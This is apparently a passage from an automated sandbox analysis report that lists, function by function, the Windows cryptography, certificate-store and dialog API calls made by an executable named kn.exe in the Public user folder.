                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1446214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,9_2_00007FF7F1446214
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,9_2_00007FF7F141A1F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13821A4 #360,#359,#357,#357,BCryptFreeBuffer,9_2_00007FF7F13821A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14061AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,9_2_00007FF7F14061AC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13D8488
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,9_2_00007FF7F13BA450
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,9_2_00007FF7F13BC450
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13544E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13544E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F140E516
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,9_2_00007FF7F136C514
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,9_2_00007FF7F13B24D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,9_2_00007FF7F13D2358
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,9_2_00007FF7F13D6374
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13823E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,9_2_00007FF7F13823E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF7F1418404
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1364410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1364410
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136E3B0 #357,#357,CryptDecodeObject,LocalFree,9_2_00007FF7F136E3B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,9_2_00007FF7F13B4694
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1376694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,9_2_00007FF7F1376694
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1370630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1370630
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416654 NCryptGetProperty,#360,9_2_00007FF7F1416654
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,9_2_00007FF7F13AA654
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13826E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,9_2_00007FF7F13826E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14166D8 NCryptFreeObject,#360,9_2_00007FF7F14166D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14086D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,9_2_00007FF7F14086D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,9_2_00007FF7F144A58C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF7F141A590
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,9_2_00007FF7F13DE57C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,9_2_00007FF7F13A25E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1368600 #357,CryptDecodeObject,GetLastError,LocalFree,9_2_00007FF7F1368600
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E65B4 NCryptIsKeyHandle,_CxxThrowException,9_2_00007FF7F13E65B4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF7F136C5D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1366824 CryptHashCertificate,GetLastError,#357,9_2_00007FF7F1366824
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0844 BCryptExportKey,#205,#359,#357,#357,9_2_00007FF7F13E0844
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E08EC BCryptGetProperty,#205,#359,#357,#357,9_2_00007FF7F13E08EC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1414914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F1414914
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,9_2_00007FF7F13CE914
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,9_2_00007FF7F144E8B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,9_2_00007FF7F135A8CC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D2724 CryptDecodeObject,GetLastError,#357,9_2_00007FF7F13D2724
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0740 BCryptCloseAlgorithmProvider,#205,#357,#357,9_2_00007FF7F13E0740
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F141A740
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E07F4 BCryptDestroyKey,#205,#357,9_2_00007FF7F13E07F4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF7F13CC7F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,9_2_00007FF7F1418814
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E07A4 BCryptDestroyHash,#205,#357,9_2_00007FF7F13E07A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13D27BC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13467CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13467CC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F13F07D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1356A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,9_2_00007FF7F1356A84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,9_2_00007FF7F13CEA7C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1412A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,9_2_00007FF7F1412A78
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,9_2_00007FF7F13E4A1C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0A18 BCryptSetProperty,#205,#359,#357,#357,9_2_00007FF7F13E0A18
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,9_2_00007FF7F13C4A34
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,9_2_00007FF7F13E2AE4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF7F13D8AFC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1382B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,9_2_00007FF7F1382B00
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E8AA0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,9_2_00007FF7F13E0ABC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF7F136C960
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1412994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,9_2_00007FF7F1412994
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E8940
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13EC940
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF7F141A9F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,9_2_00007FF7F13AE9F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,9_2_00007FF7F13CAA00
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF7F13A29A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E099C BCryptOpenAlgorithmProvider,#205,#359,#359,9_2_00007FF7F13E099C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF7F1418C58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416C88 NCryptEnumAlgorithms,#360,9_2_00007FF7F1416C88
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,9_2_00007FF7F13E2C80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1424C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,9_2_00007FF7F1424C80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416C30 NCryptOpenStorageProvider,#360,9_2_00007FF7F1416C30
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,9_2_00007FF7F137CC24
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0C3C NCryptExportKey,#205,#359,#359,#357,9_2_00007FF7F13E0C3C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1346C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,9_2_00007FF7F1346C4C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1438CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,9_2_00007FF7F1438CF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416CE0 NCryptEnumStorageProviders,#360,9_2_00007FF7F1416CE0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,9_2_00007FF7F13E2CFC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,9_2_00007FF7F13D2CF8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0D14 NCryptFinalizeKey,#205,#357,#357,9_2_00007FF7F13E0D14
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F13D4CA0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,9_2_00007FF7F13EACAC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,9_2_00007FF7F13A4CC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,9_2_00007FF7F13E0B80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,9_2_00007FF7F144EB38
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1410BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,9_2_00007FF7F1410BF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,9_2_00007FF7F136CB98
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,9_2_00007FF7F140CBB4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1410B9C CryptHashData,GetLastError,#357,9_2_00007FF7F1410B9C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E2BC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1424E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,9_2_00007FF7F1424E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,9_2_00007FF7F13E2E6C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140EE94 CryptSignMessage,SetLastError,9_2_00007FF7F140EE94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF7F13B2E7C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1380E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,9_2_00007FF7F1380E94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1370E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F1370E24
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416E48 NCryptSetProperty,#360,9_2_00007FF7F1416E48
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0EF4 NCryptImportKey,#205,#359,#359,#357,9_2_00007FF7F13E0EF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416EA8 NCryptImportKey,#360,9_2_00007FF7F1416EA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1440ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,9_2_00007FF7F1440ED0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E0D84 NCryptFreeObject,#205,#357,9_2_00007FF7F13E0D84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF7F13E2D78
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416D78 NCryptOpenKey,#360,9_2_00007FF7F1416D78
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1416D2C NCryptFreeBuffer,#360,9_2_00007FF7F1416D2C
